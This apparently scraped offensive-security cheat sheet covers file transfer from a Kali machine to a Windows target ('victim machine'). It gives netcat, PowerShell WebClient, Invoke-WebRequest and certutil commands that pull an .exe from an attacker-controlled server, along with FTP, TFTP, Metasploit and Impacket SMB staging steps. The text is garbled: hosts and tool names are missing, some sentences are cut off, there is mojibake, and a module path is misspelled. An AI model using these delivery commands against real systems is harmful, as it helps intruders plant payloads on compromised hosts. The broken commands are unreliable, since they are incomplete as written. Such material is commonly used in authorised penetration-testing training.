# python2 http server
python2 -m SimpleHTTPServer 1337 #1337 - port no
# python3 http server
python3 -m http.server 1337
# python ftp server with anon login and write permission
# installing module
pip install pyftpdlib
# starting the server
python -m pyftpdlib -p 21 --write
# sender
nc 1337 < <file_to_be_sent>
# reciever
nc -lvnp 1337 > <outfile>
Here we will be transferring the xxxx.exe
from kali to windows
In Kali, utilities like curl
and wget
will be exported by default hence, there will no need of covering file transfer methods for them
Setting UP the server :
- Apache
cp xxxx.exe /var/www/html
service apache2 start
#The apache2 server's activity can be verfied with
─[kali@kali]─[~]$ service apache2 status
â—� apache2.service - The Apache HTTP Server
Loaded: loaded (/lib/systemd/system/apache2.service; disabled; vendor preset: disabled)
Active: active (running) since Sat 2020-08-01 04:28:17 EDT; 12s ago
Receiving the file:
- When GUI is available, fire up the browser and navigate to
to download the file - When only CLI is available, the webclient object is used
powershell -c (new-object System.Net.WebClient).DownloadFile('http://iamserver:port/xxxx.exe','C:\download\path\xxxx.exe')
# If the abouve one fails
# with aliases
iwr -uri 'http://iamserver:port/xxxx.exe' -o 'C:\download\path\xxxx.exe'
# with commandlet
powershell.exe -command Invoke-WebRequest -Uri 'http://iamserver:port/xxxx.exe' -OutFile 'C:\download\path\xxxx.exe'
# file transfer when only cmd is available, output just like wget
certutil -urlcache -f http://iamserver:port/xxxx.exe xxxx.exe
- Windows has an inbuilt ftp client located in,
Setting UP the server:
- vsftpd
- Metasploit
- Installing a fully functional
service in the kali machine
apt-get install vsftpd
#in the vsftpd.conf
local_enable = yes
write_enable = yes
#end of editing config file
vsftpd start
use auxilary/server/ftp
set FTPUSER wr3nch
set FTPPASS damnedsec
set FTPROOT \<directory/path\>
Receiving the file:
- As
is pre installed in windows, ftp login to obtain files
username anonymous
password anonymous
#set the transfer to binary mode
#download file
get xxxx.exe
is installed by default in windows xp machine but is disabled in newer machines- Through tftp, files can be downloaded in a single command
Setting UP the server:
- atftpd
- Metasploit
service atftpd start
use auxilary/server/tftp
set TFTPROOT \<directory/path\>
Receiving the file:
- Enabling tftp as it is disabled by default in newer machines
pkgmgr /iu:"TFTP"
- tftp doesnt require any authentication
- If installed in the victim machine make use of it
#download a file
tftp -i GET xxxx.exe
#upload a file
tftp -i PUT xyz.exe
- SMB is exported builtin with windows
Setting UP the server:
- Linux
- Impacket
#inastall dependencies
python-glade2 system-config-samba
# Configuring SAMBA
# edit the /etc/samba/smb.conf file
# change the workgroup= WORKGROUP to your network needs and tweak and save the conf file
# restart the samba
sudo service smbd restart
- The
in the impackets will take care of every cofigurations and binds to port 445
python smbserver.py wr3nch \<directory/path\>
- This can be verified with
which is pre-installed in LINUX
# connect to the specified IP with no password
# the name wr3nch given when starting the smbserver.py will be shown as the share name
smbclient -L --no-pass
Receiving the file:
- The smb server is treated as a local share
- Just access it to obtain the files
# list the contents of the share
dir \\\wr3nch
# copy files from ther server to the windows machine
copy \\\wr3nch\xxxx.exe .
# executing files straight from the server
# mount the smb share in windows machine
net use x: \\{smb_Share_IP}\{smb_share_Name} /user:{smbShareUser} {smbSharePass}